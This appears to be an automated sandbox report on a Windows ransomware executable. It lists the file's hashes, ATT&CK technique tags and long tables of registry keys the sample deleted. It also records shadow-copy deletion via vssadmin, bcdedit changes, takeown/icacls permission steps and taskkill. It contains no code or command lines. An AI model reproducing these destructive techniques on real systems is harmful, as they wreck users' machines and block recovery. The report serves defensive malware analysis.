1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813

Reason

Machine shutdown

General

Target

1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe
Size

86KB
MD5

226213909fea9a07e66f734dedfb2d1d
SHA1

218d7e3178a60ad08abebc68bb462773a6f80b38
SHA256

1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813
SHA512

ecb0c2a7fc5ee54168dedd4f67a626ce3fea7ec977b65bb59fed36b48f1d2c20407228ad96e14969c58976e6a98ffd33399ea6f0b15ed6ba5568ce26abbfdce3

Score

10^/10

discovery exploit persistence ransomware

Malware Config

Signatures

Modifies system executable filetype association 2 TTPs 49 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

reg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\lnkfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4176 takeown.exe
4116 icacls.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

4116 icacls.exe
4176 takeown.exe

pid	process
4176	takeown.exe
4116	icacls.exe

pid	process
4116	icacls.exe
4176	takeown.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe

Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4252 bcdedit.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4276 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1692 taskkill.exe
3632 taskkill.exe

pid	process
4252	bcdedit.exe

pid	process
4276	vssadmin.exe

pid	process
1692	taskkill.exe
3632	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Services	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\22	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\30	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\39	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\VersionManager	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LowRegistry	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\New Windows	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\powerpoint	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\26	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\38	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\13	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\25	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\GPU	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\10	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\excel	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Suggested Sites	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Document Windows	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\12	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\3	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Download	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\21	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\35	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\PageSetup	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\ms-word	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\19	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\MINIE	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\18	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Desktop	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Help_Menu_URLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\IntelliForms	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\8	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\23	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\27	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Recovery	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\SearchScopes	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\MenuExt	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\ms-powerpoint	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LinksBar	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\word	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\URLSearchHooks	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\IETld	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\31	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\International\Scripts\5	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\SQM	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Zoom	reg.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\ClickNote\UserCustomization\DoubleClickBelowLock	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Control Panel\Input Method\Hot Keys\00000202	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\IdentityCRL\Immersive\production\Token	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.Messaging_8wekyb3d8bbwe!App	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\SystemExit	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Wisp\Pen\SysEventParameters	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\PrecisionTouchPad	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Control Panel\Appearance\Schemes	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Keyboard Layout\Preload	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Fax\fxsclnt\Confirm	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Pim\Contacts\Settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\DeviceDisconnect	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Control Panel\International\User Profile	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Call6\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\Explorer\SecurityBand	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\Disallowed\Certificates	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Screensavers	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Control Panel\Accessibility\ToggleKeys	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\DeviceFail	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\MisrecoSound	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\Explorer\ActivatingDocument	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\EventHandlersDefaultSelection	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\MessageNudge\.Current	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Call7\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\CTF	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\EventHandlersDefaultSelection	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Control Panel\Accessibility\SlateLaunch	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Control Panel\Accessibility	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Messaging\Service	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\ClosedCaptioning	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\DWM	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartTileGridLayout	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\PrintComplete\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\SystemAsterisk	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Alarm4\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\CTF\Assemblies	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\sapisvr\HubOnSound\.current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\ime\IMTC70	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MessagingSkype_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Shared	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\Root\CTLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\ClickNote\UserCustomization\LongPressBelowLock	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\Notification.IM\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\Explorer\SecurityBand\.default	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Telephony\HandoffPriorities\MediaModes	reg.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Telephony	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\DeviceConnect	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\ChangeTheme\.Current	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\SystemExclamation	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\Notification.Looping.Alarm\.Default	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Wisp\Pen\SysEventParameters\FlickCommands	reg.exe

Modifies registry class 64 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000C172A-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\ProgIDs\AppXe862j7twqs4aww05211jaakwxyfjx4da	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App.AppX447jn8wbjb1qsw3jxkn	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{64818D10-4F9B-11CF-86EA-00AA00B929E8}\DocObject	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{87364574-CAD0-36FF-AFE6-6106A232443B}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.aac\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dotx\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\VersionIndependentProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7197647A-7D2B-42E3-B6E2-9BAABBDC8B67}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A35AE6D3-E8D8-3355-9182-9B2A83C3B3E3}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.raf	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.xltm\ShellEx\PropertyHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E9729012-8271-4e1f-BC56-CF85F914915A}\Version	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0002447B-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7819A000-56F5-432F-BF43-662A11261696}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.vsdm\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.ods\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\{7ED96837-96F0-4812-B211-F13C24117ED3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D06FC255-7FA0-3C72-A05A-2E64B8997375}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBB}\InprocServer32	reg.exe
